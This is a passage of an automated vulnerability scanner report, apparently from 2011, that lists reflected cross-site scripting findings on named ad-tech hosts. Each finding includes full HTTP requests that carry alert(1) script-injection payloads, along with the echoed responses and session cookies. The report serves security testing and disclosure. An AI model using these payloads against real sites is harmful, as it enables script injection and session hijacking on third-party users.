The value of the color_bg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c0f"><script>alert(1)</script>584e56fd634 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef90c0f"><script>alert(1)</script>584e56fd634&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17277
Date: Sat, 17 Sep 2011 01:52:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000;background-color:#efefef90c0f"><script>alert(1)</script>584e56fd634">
...[SNIP]...

4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_bg request parameter is copied into the HTML document as plain text between tags. The payload 235f2<script>alert(1)</script>4125eaa7b51 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef235f2<script>alert(1)</script>4125eaa7b51&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17271
Date: Sat, 17 Sep 2011 01:52:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<style type="text/css">
html, body { margin:0; padding:0; height:100%; border:none; background-color:efefef235f2<script>alert(1)</script>4125eaa7b51 }


</style>
...[SNIP]...

4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_border request parameter is copied into the HTML document as plain text between tags. The payload aa51b<script>alert(1)</script>c93f4630dc4 was submitted in the color_border parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefefaa51b<script>alert(1)</script>c93f4630dc4&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:51:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
rder:none; }
a, a:visited { color:#000099; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefefaa51b<script>alert(1)</script>c93f4630dc4; }
.TitleText { color:#000000; font-weight:bold; font-size:10px; }
.NormalText { color:#000000; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }

#header
...[SNIP]...

4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_link request parameter is copied into the HTML document as plain text between tags. The payload 76dc4<script>alert(1)</script>e5a3998eb1c was submitted in the color_link parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=00009976dc4<script>alert(1)</script>e5a3998eb1c&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:52:31 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<style type="text/css">

html, body { margin:0; padding:0; height:100%; border:none; }
a, a:visited { color:#00009976dc4<script>alert(1)</script>e5a3998eb1c; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000; font-weig
...[SNIP]...

4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_text_normal request parameter is copied into the HTML document as plain text between tags. The payload 86a95<script>alert(1)</script>6511ba6bdbc was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=00000086a95<script>alert(1)</script>6511ba6bdbc&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17230
Date: Sat, 17 Sep 2011 01:53:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
lor:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000; font-weight:bold; font-size:10px; }
.NormalText { color:#00000086a95<script>alert(1)</script>6511ba6bdbc; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }

#headerDiv { background-color:#FFF;margin:2px;margin-top:0px;font-size:11px;font-weight:bold; }
#header
...[SNIP]...

4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_text_normal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3c7"><script>alert(1)</script>9ace1e3c9ad was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000bc3c7"><script>alert(1)</script>9ace1e3c9ad&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17234
Date: Sat, 17 Sep 2011 01:53:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000bc3c7"><script>alert(1)</script>9ace1e3c9ad;background-color:#efefef">
...[SNIP]...

4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_text_title request parameter is copied into the HTML document as plain text between tags. The payload 835d5<script>alert(1)</script>6102431f71c was submitted in the color_text_title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000835d5<script>alert(1)</script>6102431f71c&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:52:50 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
lor:#000099; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000835d5<script>alert(1)</script>6102431f71c; font-weight:bold; font-size:10px; }
.NormalText { color:#000000; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }

#headerDiv { background-color:#FFF;mar
...[SNIP]...

4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the default_league request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 688d1'%3balert(1)//add2da0c4a4 was submitted in the default_league parameter. This input was echoed as 688d1';alert(1)//add2da0c4a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl688d1'%3balert(1)//add2da0c4a4&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17176
Date: Sat, 17 Sep 2011 01:53:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
Id, conference, conferenceId, teamId);
populateMenu("leagueId", "leagues", "", "", "", "", "");

function setLeague() {
   if (getSelectVal('leagueId') == '-1') {
       defaultSelectTo('leagueId', 'nfl688d1';alert(1)//add2da0c4a4');
       setTimeout('leagueSelect()',500);
   }
}
function setConference() {
   if (getSelectVal('conferenceId') == '-1') {
       defaultSelectTo('conferenceId', 'null');
       setTimeout('conferenceSelect()'
...[SNIP]...

4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the default_team request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82a46'%3balert(1)//40d577401fd was submitted in the default_team parameter. This input was echoed as 82a46';alert(1)//40d577401fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=82a46'%3balert(1)//40d577401fd&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17176
Date: Sat, 17 Sep 2011 01:54:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
ceId') == '-1') {
       defaultSelectTo('conferenceId', 'null');
       setTimeout('conferenceSelect()',500);
   }
}
function setTeam() {
   if (getSelectVal('teamId') == '-1')
       defaultSelectTo('teamId', '82a46';alert(1)//40d577401fd');
}

setTimeout('setLeague()',500);
setTimeout('setLeague()',1500);
setTimeout('setLeague()',2500);


setTimeout('setTeam()',1500);
setTimeout('setTeam()',2500);
setTimeout('setTeam()
...[SNIP]...

4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload b2604<script>alert(1)</script>e25fa51e76a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:17:40 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=af410166-6960-4ca8-98db-488008c83cf7;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a)

4.63. http://api.dimestore.com/viapi [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7be4b<a>cfdf0815b78 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=7117492757be4b<a>cfdf0815b78 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0FpdVF%2BSWQ%3D; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=""; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%3D=dQ%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 17 Sep 2011 01:06:42 GMT
Content-Type: application/xml
Connection: keep-alive
Set-Cookie: pixel_7117492757be4b<a>cfdf0815b78=1; Expires=Sun, 16-Sep-2012 01:06:42 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 7117492757be4b<a>cfdf0815b78

4.64. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8df99<script>alert(1)</script>8a03bb991cc was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc&n=ar_int_p63514475&1316238877286 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:55:06 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc("");

4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 41452<script>alert(1)</script>b5bc8226dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=741452<script>alert(1)</script>b5bc8226dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:02 GMT
Date: Sat, 17 Sep 2011 00:52:02 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"741452<script>alert(1)</script>b5bc8226dea", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 66a83<script>alert(1)</script>803fdeef77b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=17&c4=http%3A%2F%2Fwww.bradsdeals.com&c5=&c6=&c10=66a83<script>alert(1)</script>803fdeef77b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
